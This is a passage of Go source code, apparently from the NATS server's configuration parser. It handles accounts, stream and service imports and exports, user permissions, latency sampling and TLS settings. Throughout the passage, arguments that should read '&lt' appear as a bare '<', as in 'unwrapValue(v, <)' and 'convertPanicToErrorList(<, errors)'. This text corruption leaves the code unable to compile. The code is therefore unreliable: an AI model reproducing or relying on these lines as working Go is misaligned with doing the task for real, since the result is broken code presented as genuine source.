m := make(map[string]struct{}, len(v.([]interface{})))
for _, n := range v.([]interface{}) {
tk, name := unwrapValue(n, <)
ns := name.(string)
// Check for reserved names.
if isReservedAccount(ns) {
err := &configErr{tk, fmt.Sprintf("%q is a Reserved Account", ns)}
*errors = append(*errors, err)
continue
}
if _, ok := m[ns]; ok {
err := &configErr{tk, fmt.Sprintf("Duplicate Account Entry: %s", ns)}
*errors = append(*errors, err)
continue
}
opts.Accounts = append(opts.Accounts, NewAccount(ns))
m[ns] = struct{}{}
}
// More common map entry
case map[string]interface{}:
// Track users across accounts, must be unique across
// accounts and nkeys vs users.
uorn := make(map[string]struct{})
for aname, mv := range vv {
tk, amv := unwrapValue(mv, <)
// Skip referenced config vars within the account block.
if tk.IsUsedVariable() {
continue
}
// These should be maps.
mv, ok := amv.(map[string]interface{})
if !ok {
err := &configErr{tk, "Expected map entries for accounts"}
*errors = append(*errors, err)
continue
}
if isReservedAccount(aname) {
err := &configErr{tk, fmt.Sprintf("%q is a Reserved Account", aname)}
*errors = append(*errors, err)
continue
}
var (
users []*User
nkeyUsr []*NkeyUser
usersTk token
)
acc := NewAccount(aname)
opts.Accounts = append(opts.Accounts, acc)
for k, v := range mv {
tk, mv := unwrapValue(v, <)
switch strings.ToLower(k) {
case "nkey":
nk, ok := mv.(string)
if !ok || !nkeys.IsValidPublicAccountKey(nk) {
err := &configErr{tk, fmt.Sprintf("Not a valid public nkey for an account: %q", mv)}
*errors = append(*errors, err)
continue
}
acc.Nkey = nk
case "imports":
streams, services, err := parseAccountImports(tk, acc, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
importStreams = append(importStreams, streams...)
importServices = append(importServices, services...)
case "exports":
streams, services, err := parseAccountExports(tk, acc, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
exportStreams = append(exportStreams, streams...)
exportServices = append(exportServices, services...)
case "jetstream":
err := parseJetStreamForAccount(mv, acc, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
case "users":
var err error
usersTk = tk
nkeyUsr, users, err = parseUsers(mv, opts, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
case "default_permissions":
permissions, err := parseUserPermissions(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
acc.defaultPerms = permissions
case "mappings", "maps":
err := parseAccountMappings(tk, acc, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: k,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
}
}
applyDefaultPermissions(users, nkeyUsr, acc.defaultPerms)
for _, u := range nkeyUsr {
if _, ok := uorn[u.Nkey]; ok {
err := &configErr{usersTk, fmt.Sprintf("Duplicate nkey %q detected", u.Nkey)}
*errors = append(*errors, err)
continue
}
uorn[u.Nkey] = struct{}{}
u.Account = acc
}
opts.Nkeys = append(opts.Nkeys, nkeyUsr...)
for _, u := range users {
if _, ok := uorn[u.Username]; ok {
err := &configErr{usersTk, fmt.Sprintf("Duplicate user %q detected", u.Username)}
*errors = append(*errors, err)
continue
}
uorn[u.Username] = struct{}{}
u.Account = acc
}
opts.Users = append(opts.Users, users...)
}
}
lt = tk
// Bail already if there are previous errors.
if len(*errors) > 0 {
return nil
}
// Parse Imports and Exports here after all accounts defined.
// Do exports first since they need to be defined for imports to succeed
// since we do permissions checks.
// Create a lookup map for accounts lookups.
am := make(map[string]*Account, len(opts.Accounts))
for _, a := range opts.Accounts {
am[a.Name] = a
}
// Do stream exports
for _, stream := range exportStreams {
// Make array of accounts if applicable.
var accounts []*Account
for _, an := range stream.accs {
ta := am[an]
if ta == nil {
msg := fmt.Sprintf("%q account not defined for stream export", an)
*errors = append(*errors, &configErr{tk, msg})
continue
}
accounts = append(accounts, ta)
}
if err := stream.acc.AddStreamExport(stream.sub, accounts); err != nil {
msg := fmt.Sprintf("Error adding stream export %q: %v", stream.sub, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
}
for _, service := range exportServices {
// Make array of accounts if applicable.
var accounts []*Account
for _, an := range service.accs {
ta := am[an]
if ta == nil {
msg := fmt.Sprintf("%q account not defined for service export", an)
*errors = append(*errors, &configErr{tk, msg})
continue
}
accounts = append(accounts, ta)
}
if err := service.acc.AddServiceExportWithResponse(service.sub, service.rt, accounts); err != nil {
msg := fmt.Sprintf("Error adding service export %q: %v", service.sub, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
if service.rthr != 0 {
// Response threshold was set in options.
if err := service.acc.SetServiceExportResponseThreshold(service.sub, service.rthr); err != nil {
msg := fmt.Sprintf("Error adding service export response threshold for %q: %v", service.sub, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
}
if service.lat != nil {
// System accounts are on be default so just make sure we have not opted out..
if opts.NoSystemAccount {
msg := fmt.Sprintf("Error adding service latency sampling for %q: %v", service.sub, ErrNoSysAccount.Error())
*errors = append(*errors, &configErr{tk, msg})
continue
}
if err := service.acc.TrackServiceExportWithSampling(service.sub, service.lat.subject, int(service.lat.sampling)); err != nil {
msg := fmt.Sprintf("Error adding service latency sampling for %q on subject %q: %v", service.sub, service.lat.subject, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
}
}
for _, stream := range importStreams {
ta := am[stream.an]
if ta == nil {
msg := fmt.Sprintf("%q account not defined for stream import", stream.an)
*errors = append(*errors, &configErr{tk, msg})
continue
}
if stream.pre != "" {
if err := stream.acc.AddStreamImport(ta, stream.sub, stream.pre); err != nil {
msg := fmt.Sprintf("Error adding stream import %q: %v", stream.sub, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
} else {
if err := stream.acc.AddMappedStreamImport(ta, stream.sub, stream.to); err != nil {
msg := fmt.Sprintf("Error adding stream import %q: %v", stream.sub, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
}
}
for _, service := range importServices {
ta := am[service.an]
if ta == nil {
msg := fmt.Sprintf("%q account not defined for service import", service.an)
*errors = append(*errors, &configErr{tk, msg})
continue
}
if service.to == "" {
service.to = service.sub
}
if err := service.acc.AddServiceImport(ta, service.to, service.sub); err != nil {
msg := fmt.Sprintf("Error adding service import %q: %v", service.sub, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
if err := service.acc.SetServiceImportSharing(ta, service.sub, service.share); err != nil {
msg := fmt.Sprintf("Error setting service import sharing %q: %v", service.sub, err)
*errors = append(*errors, &configErr{tk, msg})
continue
}
}
return nil
}
// Parse the account exports
func parseAccountExports(v interface{}, acc *Account, errors, warnings *[]error) ([]*export, []*export, error) {
var lt token
defer convertPanicToErrorList(<, errors)
// This should be an array of objects/maps.
tk, v := unwrapValue(v, <)
ims, ok := v.([]interface{})
if !ok {
return nil, nil, &configErr{tk, fmt.Sprintf("Exports should be an array, got %T", v)}
}
var services []*export
var streams []*export
for _, v := range ims {
// Should have stream or service
stream, service, err := parseExportStreamOrService(v, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
if service != nil {
service.acc = acc
services = append(services, service)
}
if stream != nil {
stream.acc = acc
streams = append(streams, stream)
}
}
return streams, services, nil
}
// Parse the account imports
func parseAccountImports(v interface{}, acc *Account, errors, warnings *[]error) ([]*importStream, []*importService, error) {
var lt token
defer convertPanicToErrorList(<, errors)
// This should be an array of objects/maps.
tk, v := unwrapValue(v, <)
ims, ok := v.([]interface{})
if !ok {
return nil, nil, &configErr{tk, fmt.Sprintf("Imports should be an array, got %T", v)}
}
var services []*importService
var streams []*importStream
svcSubjects := map[string]*importService{}
for _, v := range ims {
// Should have stream or service
stream, service, err := parseImportStreamOrService(v, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
if service != nil {
if dup := svcSubjects[service.to]; dup != nil {
tk, _ := unwrapValue(v, <)
err := &configErr{tk,
fmt.Sprintf("Duplicate service import subject %q, previously used in import for account %q, subject %q",
service.to, dup.an, dup.sub)}
*errors = append(*errors, err)
continue
}
svcSubjects[service.to] = service
service.acc = acc
services = append(services, service)
}
if stream != nil {
stream.acc = acc
streams = append(streams, stream)
}
}
return streams, services, nil
}
// Helper to parse an embedded account description for imported services or streams.
func parseAccount(v map[string]interface{}, errors, warnings *[]error) (string, string, error) {
var lt token
defer convertPanicToErrorList(<, errors)
var accountName, subject string
for mk, mv := range v {
tk, mv := unwrapValue(mv, <)
switch strings.ToLower(mk) {
case "account":
accountName = mv.(string)
case "subject":
subject = mv.(string)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
}
}
return accountName, subject, nil
}
// Parse an export stream or service.
// e.g.
// {stream: "public.>"} # No accounts means public.
// {stream: "synadia.private.>", accounts: [cncf, natsio]}
// {service: "pub.request"} # No accounts means public.
// {service: "pub.special.request", accounts: [nats.io]}
func parseExportStreamOrService(v interface{}, errors, warnings *[]error) (*export, *export, error) {
var (
curStream *export
curService *export
accounts []string
rt ServiceRespType
rtSeen bool
rtToken token
lat *serviceLatency
threshSeen bool
thresh time.Duration
latToken token
lt token
)
defer convertPanicToErrorList(<, errors)
tk, v := unwrapValue(v, <)
vv, ok := v.(map[string]interface{})
if !ok {
return nil, nil, &configErr{tk, fmt.Sprintf("Export Items should be a map with type entry, got %T", v)}
}
for mk, mv := range vv {
tk, mv := unwrapValue(mv, <)
switch strings.ToLower(mk) {
case "stream":
if curService != nil {
err := &configErr{tk, fmt.Sprintf("Detected stream %q but already saw a service", mv)}
*errors = append(*errors, err)
continue
}
if rtToken != nil {
err := &configErr{rtToken, "Detected response directive on non-service"}
*errors = append(*errors, err)
continue
}
if latToken != nil {
err := &configErr{latToken, "Detected latency directive on non-service"}
*errors = append(*errors, err)
continue
}
mvs, ok := mv.(string)
if !ok {
err := &configErr{tk, fmt.Sprintf("Expected stream name to be string, got %T", mv)}
*errors = append(*errors, err)
continue
}
curStream = &export{sub: mvs}
if accounts != nil {
curStream.accs = accounts
}
case "service":
if curStream != nil {
err := &configErr{tk, fmt.Sprintf("Detected service %q but already saw a stream", mv)}
*errors = append(*errors, err)
continue
}
mvs, ok := mv.(string)
if !ok {
err := &configErr{tk, fmt.Sprintf("Expected service name to be string, got %T", mv)}
*errors = append(*errors, err)
continue
}
curService = &export{sub: mvs}
if accounts != nil {
curService.accs = accounts
}
if rtSeen {
curService.rt = rt
}
if lat != nil {
curService.lat = lat
}
if threshSeen {
curService.rthr = thresh
}
case "response", "response_type":
if rtSeen {
err := &configErr{tk, "Duplicate response type definition"}
*errors = append(*errors, err)
continue
}
rtSeen = true
rtToken = tk
mvs, ok := mv.(string)
if !ok {
err := &configErr{tk, fmt.Sprintf("Expected response type to be string, got %T", mv)}
*errors = append(*errors, err)
continue
}
switch strings.ToLower(mvs) {
case "single", "singleton":
rt = Singleton
case "stream":
rt = Streamed
case "chunk", "chunked":
rt = Chunked
default:
err := &configErr{tk, fmt.Sprintf("Unknown response type: %q", mvs)}
*errors = append(*errors, err)
continue
}
if curService != nil {
curService.rt = rt
}
if curStream != nil {
err := &configErr{tk, "Detected response directive on non-service"}
*errors = append(*errors, err)
}
case "threshold", "response_threshold", "response_max_time", "response_time":
if threshSeen {
err := &configErr{tk, "Duplicate response threshold detected"}
*errors = append(*errors, err)
continue
}
threshSeen = true
mvs, ok := mv.(string)
if !ok {
err := &configErr{tk, fmt.Sprintf("Expected response threshold to be a parseable time duration, got %T", mv)}
*errors = append(*errors, err)
continue
}
var err error
thresh, err = time.ParseDuration(mvs)
if err != nil {
err := &configErr{tk, fmt.Sprintf("Expected response threshold to be a parseable time duration, got %q", mvs)}
*errors = append(*errors, err)
continue
}
if curService != nil {
curService.rthr = thresh
}
if curStream != nil {
err := &configErr{tk, "Detected response directive on non-service"}
*errors = append(*errors, err)
}
case "accounts":
for _, iv := range mv.([]interface{}) {
_, mv := unwrapValue(iv, <)
accounts = append(accounts, mv.(string))
}
if curStream != nil {
curStream.accs = accounts
} else if curService != nil {
curService.accs = accounts
}
case "latency":
latToken = tk
var err error
lat, err = parseServiceLatency(tk, mv)
if err != nil {
*errors = append(*errors, err)
continue
}
if curStream != nil {
err = &configErr{tk, "Detected latency directive on non-service"}
*errors = append(*errors, err)
continue
}
if curService != nil {
curService.lat = lat
}
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
}
}
return curStream, curService, nil
}
// parseServiceLatency returns a latency config block.
func parseServiceLatency(root token, v interface{}) (l *serviceLatency, retErr error) {
var lt token
defer convertPanicToError(<, &retErr)
if subject, ok := v.(string); ok {
return &serviceLatency{
subject: subject,
sampling: DEFAULT_SERVICE_LATENCY_SAMPLING,
}, nil
}
latency, ok := v.(map[string]interface{})
if !ok {
return nil, &configErr{token: root,
reason: fmt.Sprintf("Expected latency entry to be a map/struct or string, got %T", v)}
}
sl := serviceLatency{
sampling: DEFAULT_SERVICE_LATENCY_SAMPLING,
}
// Read sampling value.
if v, ok := latency["sampling"]; ok {
tk, v := unwrapValue(v, <)
header := false
var sample int64
switch vv := v.(type) {
case int64:
// Sample is an int, like 50.
sample = vv
case string:
// Sample is a string, like "50%".
if strings.ToLower(strings.TrimSpace(vv)) == "headers" {
header = true
sample = 0
break
}
s := strings.TrimSuffix(vv, "%")
n, err := strconv.Atoi(s)
if err != nil {
return nil, &configErr{token: tk,
reason: fmt.Sprintf("Failed to parse latency sample: %v", err)}
}
sample = int64(n)
default:
return nil, &configErr{token: tk,
reason: fmt.Sprintf("Expected latency sample to be a string or map/struct, got %T", v)}
}
if !header {
if sample < 1 || sample > 100 {
return nil, &configErr{token: tk,
reason: ErrBadSampling.Error()}
}
}
sl.sampling = int8(sample)
}
// Read subject value.
v, ok = latency["subject"]
if !ok {
return nil, &configErr{token: root,
reason: "Latency subject required, but missing"}
}
tk, v := unwrapValue(v, <)
subject, ok := v.(string)
if !ok {
return nil, &configErr{token: tk,
reason: fmt.Sprintf("Expected latency subject to be a string, got %T", subject)}
}
sl.subject = subject
return &sl, nil
}
// Parse an import stream or service.
// e.g.
// {stream: {account: "synadia", subject:"public.synadia"}, prefix: "imports.synadia"}
// {stream: {account: "synadia", subject:"synadia.private.*"}}
// {service: {account: "synadia", subject: "pub.special.request"}, to: "synadia.request"}
func parseImportStreamOrService(v interface{}, errors, warnings *[]error) (*importStream, *importService, error) {
var (
curStream *importStream
curService *importService
pre, to string
share bool
lt token
)
defer convertPanicToErrorList(<, errors)
tk, mv := unwrapValue(v, <)
vv, ok := mv.(map[string]interface{})
if !ok {
return nil, nil, &configErr{tk, fmt.Sprintf("Import Items should be a map with type entry, got %T", mv)}
}
for mk, mv := range vv {
tk, mv := unwrapValue(mv, <)
switch strings.ToLower(mk) {
case "stream":
if curService != nil {
err := &configErr{tk, "Detected stream but already saw a service"}
*errors = append(*errors, err)
continue
}
ac, ok := mv.(map[string]interface{})
if !ok {
err := &configErr{tk, fmt.Sprintf("Stream entry should be an account map, got %T", mv)}
*errors = append(*errors, err)
continue
}
// Make sure this is a map with account and subject
accountName, subject, err := parseAccount(ac, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
if accountName == "" || subject == "" {
err := &configErr{tk, "Expect an account name and a subject"}
*errors = append(*errors, err)
continue
}
curStream = &importStream{an: accountName, sub: subject}
if to != "" {
curStream.to = to
}
if pre != "" {
curStream.pre = pre
}
case "service":
if curStream != nil {
err := &configErr{tk, "Detected service but already saw a stream"}
*errors = append(*errors, err)
continue
}
ac, ok := mv.(map[string]interface{})
if !ok {
err := &configErr{tk, fmt.Sprintf("Service entry should be an account map, got %T", mv)}
*errors = append(*errors, err)
continue
}
// Make sure this is a map with account and subject
accountName, subject, err := parseAccount(ac, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
if accountName == "" || subject == "" {
err := &configErr{tk, "Expect an account name and a subject"}
*errors = append(*errors, err)
continue
}
curService = &importService{an: accountName, sub: subject}
if to != "" {
curService.to = to
} else {
curService.to = subject
}
curService.share = share
case "prefix":
pre = mv.(string)
if curStream != nil {
curStream.pre = pre
}
case "to":
to = mv.(string)
if curService != nil {
curService.to = to
}
if curStream != nil {
curStream.to = to
if curStream.pre != "" {
err := &configErr{tk, "Stream import can not have a 'prefix' and a 'to' property"}
*errors = append(*errors, err)
continue
}
}
case "share":
share = mv.(bool)
if curService != nil {
curService.share = share
}
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
}
}
return curStream, curService, nil
}
// Apply permission defaults to users/nkeyuser that don't have their own.
func applyDefaultPermissions(users []*User, nkeys []*NkeyUser, defaultP *Permissions) {
if defaultP == nil {
return
}
for _, user := range users {
if user.Permissions == nil {
user.Permissions = defaultP
}
}
for _, user := range nkeys {
if user.Permissions == nil {
user.Permissions = defaultP
}
}
}
// Helper function to parse Authorization configs.
func parseAuthorization(v interface{}, opts *Options, errors *[]error, warnings *[]error) (*authorization, error) {
var (
am map[string]interface{}
tk token
lt token
auth = &authorization{}
)
defer convertPanicToErrorList(<, errors)
_, v = unwrapValue(v, <)
am = v.(map[string]interface{})
for mk, mv := range am {
tk, mv = unwrapValue(mv, <)
switch strings.ToLower(mk) {
case "user", "username":
auth.user = mv.(string)
case "pass", "password":
auth.pass = mv.(string)
case "token":
auth.token = mv.(string)
case "timeout":
at := float64(1)
switch mv := mv.(type) {
case int64:
at = float64(mv)
case float64:
at = mv
}
auth.timeout = at
case "users":
nkeys, users, err := parseUsers(tk, opts, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
auth.users = users
auth.nkeys = nkeys
case "default_permission", "default_permissions", "permissions":
permissions, err := parseUserPermissions(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
auth.defaultPermissions = permissions
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
continue
}
applyDefaultPermissions(auth.users, auth.nkeys, auth.defaultPermissions)
}
return auth, nil
}
// Helper function to parse multiple users array with optional permissions.
func parseUsers(mv interface{}, opts *Options, errors *[]error, warnings *[]error) ([]*NkeyUser, []*User, error) {
var (
tk token
lt token
keys []*NkeyUser
users = []*User{}
)
defer convertPanicToErrorList(<, errors)
tk, mv = unwrapValue(mv, <)
// Make sure we have an array
uv, ok := mv.([]interface{})
if !ok {
return nil, nil, &configErr{tk, fmt.Sprintf("Expected users field to be an array, got %v", mv)}
}
for _, u := range uv {
tk, u = unwrapValue(u, <)
// Check its a map/struct
um, ok := u.(map[string]interface{})
if !ok {
err := &configErr{tk, fmt.Sprintf("Expected user entry to be a map/struct, got %v", u)}
*errors = append(*errors, err)
continue
}
var (
user = &User{}
nkey = &NkeyUser{}
perms *Permissions
err error
)
for k, v := range um {
// Also needs to unwrap first
tk, v = unwrapValue(v, <)
switch strings.ToLower(k) {
case "nkey":
nkey.Nkey = v.(string)
case "user", "username":
user.Username = v.(string)
case "pass", "password":
user.Password = v.(string)
case "permission", "permissions", "authorization":
perms, err = parseUserPermissions(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
case "allowed_connection_types", "connection_types", "clients":
cts := parseAllowedConnectionTypes(tk, <, v, errors, warnings)
nkey.AllowedConnectionTypes = cts
user.AllowedConnectionTypes = cts
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: k,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
// Place perms if we have them.
if perms != nil {
// nkey takes precedent.
if nkey.Nkey != "" {
nkey.Permissions = perms
} else {
user.Permissions = perms
}
}
// Check to make sure we have at least an nkey or username <password> defined.
if nkey.Nkey == "" && user.Username == "" {
return nil, nil, &configErr{tk, "User entry requires a user"}
} else if nkey.Nkey != "" {
// Make sure the nkey a proper public nkey for a user..
if !nkeys.IsValidPublicUserKey(nkey.Nkey) {
return nil, nil, &configErr{tk, "Not a valid public nkey for a user"}
}
// If we have user or password defined here that is an error.
if user.Username != "" || user.Password != "" {
return nil, nil, &configErr{tk, "Nkey users do not take usernames or passwords"}
}
keys = append(keys, nkey)
} else {
users = append(users, user)
}
}
return keys, users, nil
}
func parseAllowedConnectionTypes(tk token, lt *token, mv interface{}, errors *[]error, warnings *[]error) map[string]struct{} {
cts, err := parseStringArray("allowed connection types", tk, lt, mv, errors, warnings)
// If error, it has already been added to the `errors` array, simply return
if err != nil {
return nil
}
m, err := convertAllowedConnectionTypes(cts)
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
}
return m
}
// Helper function to parse user/account permissions
func parseUserPermissions(mv interface{}, errors, warnings *[]error) (*Permissions, error) {
var (
tk token
lt token
p = &Permissions{}
)
defer convertPanicToErrorList(<, errors)
tk, mv = unwrapValue(mv, <)
pm, ok := mv.(map[string]interface{})
if !ok {
return nil, &configErr{tk, fmt.Sprintf("Expected permissions to be a map/struct, got %+v", mv)}
}
for k, v := range pm {
tk, mv = unwrapValue(v, <)
switch strings.ToLower(k) {
// For routes:
// Import is Publish
// Export is Subscribe
case "pub", "publish", "import":
perms, err := parseVariablePermissions(mv, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
p.Publish = perms
case "sub", "subscribe", "export":
perms, err := parseVariablePermissions(mv, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
p.Subscribe = perms
case "publish_allow_responses", "allow_responses":
rp := &ResponsePermission{
MaxMsgs: DEFAULT_ALLOW_RESPONSE_MAX_MSGS,
Expires: DEFAULT_ALLOW_RESPONSE_EXPIRATION,
}
// Try boolean first
responses, ok := mv.(bool)
if ok {
if responses {
p.Response = rp
}
} else {
p.Response = parseAllowResponses(v, errors, warnings)
}
if p.Response != nil {
if p.Publish == nil {
p.Publish = &SubjectPermission{}
}
if p.Publish.Allow == nil {
// We turn off the blanket allow statement.
p.Publish.Allow = []string{}
}
}
default:
if !tk.IsUsedVariable() {
err := &configErr{tk, fmt.Sprintf("Unknown field %q parsing permissions", k)}
*errors = append(*errors, err)
}
}
}
return p, nil
}
// Top level parser for authorization configurations.
func parseVariablePermissions(v interface{}, errors, warnings *[]error) (*SubjectPermission, error) {
switch vv := v.(type) {
case map[string]interface{}:
// New style with allow and/or deny properties.
return parseSubjectPermission(vv, errors, warnings)
default:
// Old style
return parseOldPermissionStyle(v, errors, warnings)
}
}
// Helper function to parse subject singletons and/or arrays
func parseSubjects(v interface{}, errors, warnings *[]error) ([]string, error) {
var lt token
defer convertPanicToErrorList(<, errors)
tk, v := unwrapValue(v, <)
var subjects []string
switch vv := v.(type) {
case string:
subjects = append(subjects, vv)
case []string:
subjects = vv
case []interface{}:
for _, i := range vv {
tk, i := unwrapValue(i, <)
subject, ok := i.(string)
if !ok {
return nil, &configErr{tk, "Subject in permissions array cannot be cast to string"}
}
subjects = append(subjects, subject)
}
default:
return nil, &configErr{tk, fmt.Sprintf("Expected subject permissions to be a subject, or array of subjects, got %T", v)}
}
if err := checkSubjectArray(subjects); err != nil {
return nil, &configErr{tk, err.Error()}
}
return subjects, nil
}
// Helper function to parse a ResponsePermission.
func parseAllowResponses(v interface{}, errors, warnings *[]error) *ResponsePermission {
var lt token
defer convertPanicToErrorList(<, errors)
tk, v := unwrapValue(v, <)
// Check if this is a map.
pm, ok := v.(map[string]interface{})
if !ok {
err := &configErr{tk, "error parsing response permissions, expected a boolean or a map"}
*errors = append(*errors, err)
return nil
}
rp := &ResponsePermission{
MaxMsgs: DEFAULT_ALLOW_RESPONSE_MAX_MSGS,
Expires: DEFAULT_ALLOW_RESPONSE_EXPIRATION,
}
for k, v := range pm {
tk, v = unwrapValue(v, <)
switch strings.ToLower(k) {
case "max", "max_msgs", "max_messages", "max_responses":
max := int(v.(int64))
// Negative values are accepted (mean infinite), and 0
// means default value (set above).
if max != 0 {
rp.MaxMsgs = max
}
case "expires", "expiration", "ttl":
wd, ok := v.(string)
if ok {
ttl, err := time.ParseDuration(wd)
if err != nil {
err := &configErr{tk, fmt.Sprintf("error parsing expires: %v", err)}
*errors = append(*errors, err)
return nil
}
// Negative values are accepted (mean infinite), and 0
// means default value (set above).
if ttl != 0 {
rp.Expires = ttl
}
} else {
err := &configErr{tk, "error parsing expires, not a duration string"}
*errors = append(*errors, err)
return nil
}
default:
if !tk.IsUsedVariable() {
err := &configErr{tk, fmt.Sprintf("Unknown field %q parsing permissions", k)}
*errors = append(*errors, err)
}
}
}
return rp
}
// Helper function to parse old style authorization configs.
func parseOldPermissionStyle(v interface{}, errors, warnings *[]error) (*SubjectPermission, error) {
subjects, err := parseSubjects(v, errors, warnings)
if err != nil {
return nil, err
}
return &SubjectPermission{Allow: subjects}, nil
}
// Helper function to parse new style authorization into a SubjectPermission with Allow and Deny.
func parseSubjectPermission(v interface{}, errors, warnings *[]error) (*SubjectPermission, error) {
var lt token
defer convertPanicToErrorList(<, errors)
m := v.(map[string]interface{})
if len(m) == 0 {
return nil, nil
}
p := &SubjectPermission{}
for k, v := range m {
tk, _ := unwrapValue(v, <)
switch strings.ToLower(k) {
case "allow":
subjects, err := parseSubjects(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
p.Allow = subjects
case "deny":
subjects, err := parseSubjects(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
p.Deny = subjects
default:
if !tk.IsUsedVariable() {
err := &configErr{tk, fmt.Sprintf("Unknown field name %q parsing subject permissions, only 'allow' or 'deny' are permitted", k)}
*errors = append(*errors, err)
}
}
}
return p, nil
}
// Helper function to validate subjects, etc for account permissioning.
func checkSubjectArray(sa []string) error {
for _, s := range sa {
if !IsValidSubject(s) {
return fmt.Errorf("subject %q is not a valid subject", s)
}
}
return nil
}
// PrintTLSHelpAndDie prints TLS usage and exits.
func PrintTLSHelpAndDie() {
fmt.Printf("%s", tlsUsage)
for k := range cipherMap {
fmt.Printf(" %s\n", k)
}
fmt.Printf("\nAvailable curve preferences include:\n")
for k := range curvePreferenceMap {
fmt.Printf(" %s\n", k)
}
os.Exit(0)
}
func parseCipher(cipherName string) (uint16, error) {
cipher, exists := cipherMap[cipherName]
if !exists {
return 0, fmt.Errorf("unrecognized cipher %s", cipherName)
}
return cipher, nil
}
func parseCurvePreferences(curveName string) (tls.CurveID, error) {
curve, exists := curvePreferenceMap[curveName]
if !exists {
return 0, fmt.Errorf("unrecognized curve preference %s", curveName)
}
return curve, nil
}
// Helper function to parse TLS configs.
func parseTLS(v interface{}, isClientCtx bool) (t *TLSConfigOpts, retErr error) {
var (
tlsm map[string]interface{}
tc = TLSConfigOpts{}
lt token
)
defer convertPanicToError(<, &retErr)
_, v = unwrapValue(v, <)
tlsm = v.(map[string]interface{})
for mk, mv := range tlsm {
tk, mv := unwrapValue(mv, <)
switch strings.ToLower(mk) {
case "cert_file":
certFile, ok := mv.(string)
if !ok {
return nil, &configErr{tk, "error parsing tls config, expected 'cert_file' to be filename"}
}
tc.CertFile = certFile
case "key_file":
keyFile, ok := mv.(string)
if !ok {
return nil, &configErr{tk, "error parsing tls config, expected 'key_file' to be filename"}
}
tc.KeyFile = keyFile
case "ca_file":
caFile, ok := mv.(string)
if !ok {
return nil, &configErr{tk, "error parsing tls config, expected 'ca_file' to be filename"}
}
tc.CaFile = caFile
case "insecure":
insecure, ok := mv.(bool)
if !ok {
return nil, &configErr{tk, "error parsing tls config, expected 'insecure' to be a boolean"}
}
tc.Insecure = insecure
case "verify":
verify, ok := mv.(bool)
if !ok {
return nil, &configErr{tk, "error parsing tls config, expected 'verify' to be a boolean"}
}
tc.Verify = verify
case "verify_and_map":
verify, ok := mv.(bool)
if !ok {
return nil, &configErr{tk, "error parsing tls config, expected 'verify_and_map' to be a boolean"}
}
if verify {
tc.Verify = verify
}
tc.Map = verify
case "verify_cert_and_check_known_urls":
verify, ok := mv.(bool)
if !ok {
return nil, &configErr{tk, "error parsing tls config, expected 'verify_cert_and_check_known_urls' to be a boolean"}
}
if verify && isClientCtx {
return nil, &configErr{tk, "verify_cert_and_check_known_urls not supported in this context"}
}
if verify {
tc.Verify = verify
}
tc.TLSCheckKnownURLs = verify
case "cipher_suites":
ra := mv.([]interface{})
if len(ra) == 0 {
return nil, &configErr{tk, "error parsing tls config, 'cipher_suites' cannot be empty"}
}
tc.Ciphers = make([]uint16, 0, len(ra))
for _, r := range ra {
tk, r := unwrapValue(r, <)
cipher, err := parseCipher(r.(string))
if err != nil {
return nil, &configErr{tk, err.Error()}
}
tc.Ciphers = append(tc.Ciphers, cipher)
}
case "curve_preferences":
ra := mv.([]interface{})
if len(ra) == 0 {
return nil, &configErr{tk, "error parsing tls config, 'curve_preferences' cannot be empty"}
}
tc.CurvePreferences = make([]tls.CurveID, 0, len(ra))
for _, r := range ra {
tk, r := unwrapValue(r, <)
cps, err := parseCurvePreferences(r.(string))
if err != nil {
return nil, &configErr{tk, err.Error()}
}
tc.CurvePreferences = append(tc.CurvePreferences, cps)
}
case "timeout":
at := float64(0)
switch mv := mv.(type) {
case int64:
at = float64(mv)
case float64:
at = mv
}
tc.Timeout = at
default:
return nil, &configErr{tk, fmt.Sprintf("error parsing tls config, unknown field [%q]", mk)}
}
}
// If cipher suites were not specified then use the defaults
if tc.Ciphers == nil {
tc.Ciphers = defaultCipherSuites()
}
// If curve preferences were not specified, then use the defaults
if tc.CurvePreferences == nil {
tc.CurvePreferences = defaultCurvePreferences()
}
return &tc, nil
}
func parseSimpleAuth(v interface{}, errors *[]error, warnings *[]error) *authorization {
var (
am map[string]interface{}
tk token
lt token
auth = &authorization{}
)
defer convertPanicToErrorList(<, errors)
_, v = unwrapValue(v, <)
am = v.(map[string]interface{})
for mk, mv := range am {
